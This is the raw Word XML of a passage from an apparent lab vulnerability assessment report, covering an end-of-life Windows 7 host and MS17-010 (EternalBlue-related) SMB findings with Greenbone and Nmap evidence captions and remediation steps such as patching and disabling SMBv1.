        <w:t xml:space="preserve">The Greenbone scan detected “OS End-of-Life Detection” with a CVSS score of 10.0. Nmap fingerprinting also confirmed Windows 7. This increases the risk of remote code execution, lateral movement, and service exploitation across the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E7537A">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>network.</w:t>
      </w:r>
      <w:r w:rsidR="00E54DF5" w:rsidRPr="0094128D">
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E54DF5" w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> OS fingerprint corroborates legacy</w:t>
      </w:r>
      <w:r w:rsidR="00E31294">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E54DF5" w:rsidRPr="0094128D">
        <w:t>Windows release.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEA1B4C" w14:textId="68BE38D6" w:rsidR="00444C92" w:rsidRPr="00870C85" w:rsidRDefault="00E31294" w:rsidP="00E31294">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A803AA6" wp14:editId="1E6E8199">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>24461</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>902335</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5063490" cy="1439104"/>
                <wp:effectExtent l="57150" t="19050" r="80010" b="104140"/>
                <wp:wrapNone/>
                <wp:docPr id="2062498169" name="Rectangle 22"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5063490" cy="1439104"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="127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2468F" id="Rectangle 22" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.95pt;margin-top:71.05pt;width:398.7pt;height:11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" filled="f" strokecolor="#e00" strokeweight="1pt">
                <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A65657" w:rsidRPr="00A65657">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="433DC569" wp14:editId="7175E2AD">
            <wp:extent cx="5200153" cy="3118981"/>
            <wp:effectExtent l="0" t="0" r="635" b="5715"/>
            <wp:docPr id="18824757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2255" cy="3144233"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC68D84" w14:textId="7A163AD3" w:rsidR="00444C92" w:rsidRPr="00763017" w:rsidRDefault="00444C92" w:rsidP="00E31294">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF2357">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00C20C3E" w:rsidRPr="00FF2357">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF2357">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00763017">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00551AFA" w:rsidRPr="00763017">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap –O output snippet of 192.168.57.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B02166" w14:textId="77777777" w:rsidR="003D641E" w:rsidRPr="005B7152" w:rsidRDefault="003D641E" w:rsidP="003D641E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B7152">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SUGGESTED REMEDIATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFE3446" w14:textId="77777777" w:rsidR="003D641E" w:rsidRDefault="003D641E" w:rsidP="003D641E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152842B1" w14:textId="77777777" w:rsidR="003D641E" w:rsidRPr="005B7152" w:rsidRDefault="003D641E" w:rsidP="003D641E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B7152">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44932AEF" w14:textId="77777777" w:rsidR="003D641E" w:rsidRDefault="003D641E" w:rsidP="003D641E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13877867" w14:textId="77777777" w:rsidR="00CD0EB9" w:rsidRPr="00CD0EB9" w:rsidRDefault="00D422E2" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc1994268691"/>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve">Migrate the host to a </w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>supported Windows version</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CD0EB9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67109DB5" w14:textId="16569B10" w:rsidR="00CD0EB9" w:rsidRPr="00CD0EB9" w:rsidRDefault="00CD0EB9" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0EB9">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Decommission unsupported systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD39B1" w14:textId="1C2868DE" w:rsidR="00D422E2" w:rsidRPr="00F454C9" w:rsidRDefault="00CD0EB9" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0EB9">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Restrict network access until migration is complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C9554" w14:textId="34D78B80" w:rsidR="007372EC" w:rsidRDefault="00D422E2" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Isolate</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> the legacy system behind firewall rules until migrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBF1B29" w14:textId="77777777" w:rsidR="009C54F5" w:rsidRDefault="009C54F5" w:rsidP="009C54F5">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="392C83FE" w14:textId="659A98A4" w:rsidR="00BA4A38" w:rsidRPr="00BA4A38" w:rsidRDefault="00E457B3" w:rsidP="00BA4A38">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00BA4A38" w:rsidRPr="00BA4A38">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00833E2E" w:rsidRPr="00833E2E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Microsoft Windows SMB Server Multiple Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a8"/>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BA4A38" w14:paraId="0954E2F1" w14:textId="77777777" w:rsidTr="00204600">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A61C00"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7BD08395" w14:textId="6DCE30E1" w:rsidR="00BA4A38" w:rsidRDefault="00BA4A38" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH RISK (</w:t>
            </w:r>
            <w:r w:rsidR="003B64F3">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>8.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA4A38" w14:paraId="4CA28F71" w14:textId="77777777" w:rsidTr="00204600">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1892FC1D" w14:textId="77777777" w:rsidR="00BA4A38" w:rsidRDefault="00BA4A38" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Exploitation Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D99594" w:themeFill="accent2" w:themeFillTint="99"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="59DE9FBA" w14:textId="77777777" w:rsidR="00BA4A38" w:rsidRDefault="00BA4A38" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA4A38" w14:paraId="02CE4528" w14:textId="77777777" w:rsidTr="00204600">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1365B8F8" w14:textId="77777777" w:rsidR="00BA4A38" w:rsidRDefault="00BA4A38" w:rsidP="00204600">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tcPr>
          <w:p w14:paraId="4075D08B" w14:textId="77777777" w:rsidR="00BA4A38" w:rsidRDefault="00BA4A38" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA4A38" w14:paraId="19EA3CBD" w14:textId="77777777" w:rsidTr="00204600">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CCCCCC"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E3FCF25" w14:textId="77777777" w:rsidR="00BA4A38" w:rsidRDefault="00BA4A38" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6345" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D99594" w:themeFill="accent2" w:themeFillTint="99"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="30FAA074" w14:textId="1489FF02" w:rsidR="00BA4A38" w:rsidRDefault="003B64F3" w:rsidP="00204600">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B64F3">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A28D3C9" w14:textId="77777777" w:rsidR="00BA4A38" w:rsidRDefault="00BA4A38" w:rsidP="00D55CFD"/>
    <w:p w14:paraId="1B51978B" w14:textId="77777777" w:rsidR="00BA4A38" w:rsidRDefault="00BA4A38" w:rsidP="00D55CFD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55CFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synopsis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AABF35E" w14:textId="28B6BA83" w:rsidR="009A52FD" w:rsidRDefault="00C16634" w:rsidP="00763017">
      <w:r w:rsidRPr="00C16634">
        <w:t>The SMB service on Victim-Laptop is affected by multiple vulnerabilities (MS17-010 family) that could allow remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A948C1" w14:textId="77777777" w:rsidR="00371818" w:rsidRDefault="00371818" w:rsidP="00763017">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F382E5" w14:textId="482EE8F6" w:rsidR="001079F6" w:rsidRDefault="00763017" w:rsidP="00763017">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00763017">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidR="001079F6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C081D8B" w14:textId="017AD5BF" w:rsidR="009A52FD" w:rsidRDefault="00EF6B9C" w:rsidP="00922F20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-DE" w:eastAsia="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF6B9C">
        <w:t>Greenbone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF6B9C">
        <w:t xml:space="preserve"> detected “Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)” with a CVSS score of 8.1. Several CVEs (e.g., CVE-2017-0143 to CVE-2017-0148) are linked to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF6B9C">
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF6B9C">
        <w:t xml:space="preserve"> and similar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF6B9C">
        <w:t>wormable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF6B9C">
        <w:t xml:space="preserve"> exploits. The host has port 445/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF6B9C">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF6B9C">
        <w:t xml:space="preserve"> open, confirmed by Nmap.</w:t>
      </w:r>
      <w:r w:rsidR="00922F20" w:rsidRPr="00922F20">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-DE" w:eastAsia="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD69390" w14:textId="77777777" w:rsidR="00EA322D" w:rsidRDefault="00EA322D" w:rsidP="00922F20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-DE" w:eastAsia="en-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B886D06" w14:textId="6066AF84" w:rsidR="00922F20" w:rsidRPr="00922F20" w:rsidRDefault="009A52FD" w:rsidP="00922F20">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10B89C9A" wp14:editId="772B0E2C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>65101</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1685318</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4164993" cy="418271"/>
                <wp:effectExtent l="57150" t="19050" r="83185" b="96520"/>
                <wp:wrapNone/>
                <wp:docPr id="1479782586" name="Rectangle 30"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4164993" cy="418271"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="127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E1046" id="Rectangle 30" o:spid="_x0000_s1026" style="position:absolute;margin-left:5.15pt;margin-top:132.7pt;width:327.95pt;height:32.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" filled="f" strokecolor="#e00" strokeweight="1pt">
                <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00922F20" w:rsidRPr="00922F20">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E444143" wp14:editId="49CBB84D">
            <wp:extent cx="5629523" cy="3989383"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="132350764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07644" name="Picture 32"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36298" cy="3994184"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74385644" w14:textId="2ACE4D99" w:rsidR="00763017" w:rsidRDefault="00763017" w:rsidP="00763017">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B323ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00EA5355" w:rsidRPr="00B323ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00B323ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00763017">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C557A" w:rsidRPr="000C557A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Greenbone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000C557A" w:rsidRPr="000C557A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB server vulnerabilities report for 192.168.57.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1996472B" w14:textId="77777777" w:rsidR="00BC1282" w:rsidRPr="00763017" w:rsidRDefault="00BC1282" w:rsidP="00763017">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C60868" w14:textId="2A590362" w:rsidR="00763017" w:rsidRPr="00763017" w:rsidRDefault="00763017" w:rsidP="00763017">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00763017">
        <w:t xml:space="preserve">SUGGESTED REMEDIATION </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793D5DD6" w14:textId="77777777" w:rsidR="00763017" w:rsidRPr="00763017" w:rsidRDefault="00763017" w:rsidP="00763017">
      <w:r w:rsidRPr="00763017">
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFA3E37" w14:textId="77777777" w:rsidR="008B1354" w:rsidRPr="008B1354" w:rsidRDefault="008B1354" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008B1354">
        <w:t>Apply MS17-010 and related SMB patches immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639FCBB2" w14:textId="77777777" w:rsidR="008B1354" w:rsidRDefault="005E2442" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve">Enforce </w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMB signing</w:t>
      </w:r>
      <w:r w:rsidR="008B1354">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008B1354" w:rsidRPr="008B1354">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disable SMBv1 protocol.</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SMBv2+ only</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
